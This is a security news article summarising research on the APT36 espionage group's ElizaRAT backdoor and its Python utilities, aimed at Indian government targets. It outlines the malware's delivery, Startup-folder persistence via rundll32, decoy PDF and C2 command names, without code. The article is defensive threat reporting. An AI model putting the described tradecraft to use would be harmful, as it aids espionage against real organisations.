APT36 is a highly sophisticated APT (Advanced Persistent Threat) group that is known for conducting targeted espionage in South Asia and is strongly linked to Pakistan.
While this APT group is known for targeting the following Indian sectors:-
- Government
- Defense
- Education
Since 2013, this APT group has been active, and to conduct cyberespionage, it uses the following methods:-
- Credential harvesting
- Malware distribution
Here below, we have mentioned the resources used by APT36:-
- Custom-built remote administration tools targeting Windows
- Lightweight Python-compiled cyber espionage tools serving specific purposes targeting Windows and Linux
- Weaponized open-source C2 frameworks like Mythic
- Trojanized installers of Indian government applications like KAVACH multi-factor authentication
- Trojanized Android apps
- Credential phishing sites targeting Indian government officials
Zscaler analysts dubbed the Windows backdoor used by APT36 ‘ElizaRAT,’ because of unique strings in observed C2 commands.
APT36 Employing Customized Malware
ElizaRAT, delivered as .NET binaries in password-protected Google Drive archives, deploys as a Control Panel applet, launching CplApplet() and Main() functions that lead to malicious operations in MainAsync().
Deploy Advanced AI-Powered Email Security Solution
Protect your Business Email from threats like tracking, blocking, modifying, phishing, account takeover, business email compromise, malware, and ransomware with Trustifi’s AI-powered email security solution.
Each infected machine gets a unique identifier by combining the processorID and UUID with a ‘.cookie’ extension, serving as both UUID and username.
Here below, we have mentioned all the supported C2 commands:-
- /dir
- /upload
- /getprocess
- /run
- /delete
- /end
- /online
- /identity
- /ping
- /scr
- /createdir
The bot generates a Windows shortcut (LNK) to ensure persistence in the Startup directory. It disguises itself as a ‘Text Editing APP for Windows,’ executing the Control Panel applet via rundll32.
The Program class’s dosome() method displays a distraction decoy PDF from the .NET binary’s resources, designed to mislead the user into thinking an error occurred.
APT36’s unique use of Linux desktop entry files in rare attacks is a first, with three undetected samples found since its inception in May 2023, used in a phishing scheme against the Indian government.
The cross-platform Linux payload, designed for Linux and WSL machines and lacking a complete C2 mechanism, suggests an initial test in its developmental phase by the threat actor.
The PDF mimics an Indian Defence Ministry document detailing a Saudi delegation’s discussion with Indian military medics.
Python-Based Cyber Espionage Utilities
APT36 uses Python-based ELF binaries for cyber espionage, targeting the Indian govt, Windows, and Linux systems. Here below, we have mentioned all the new Python-based cyber espionage utilities:-
- GLOBSHELL
- PYSHELLFOX
Moreover, the ElizaRAT, distributed via harmful Google Drive links, allowed researchers to extract data about the Drive’s owner and linked email.
IOCs
Keep informed about the latest cybersecurity news by following us on Google News, Linkedin, Twitter, and Facebook.
%20(1).webp "Criminal IP and Quad9 Collaborate to Exchange Domain and IP Threat Intelligence"){kind=small}
%20(1).webp "Apple iTunes For Windows Flaw Let Attackers Execute Malicious Code"){kind=small}
%20(1)%20(1).webp "PoC Exploit Released for Ivanti EPMM MobileIron Core"){kind=small}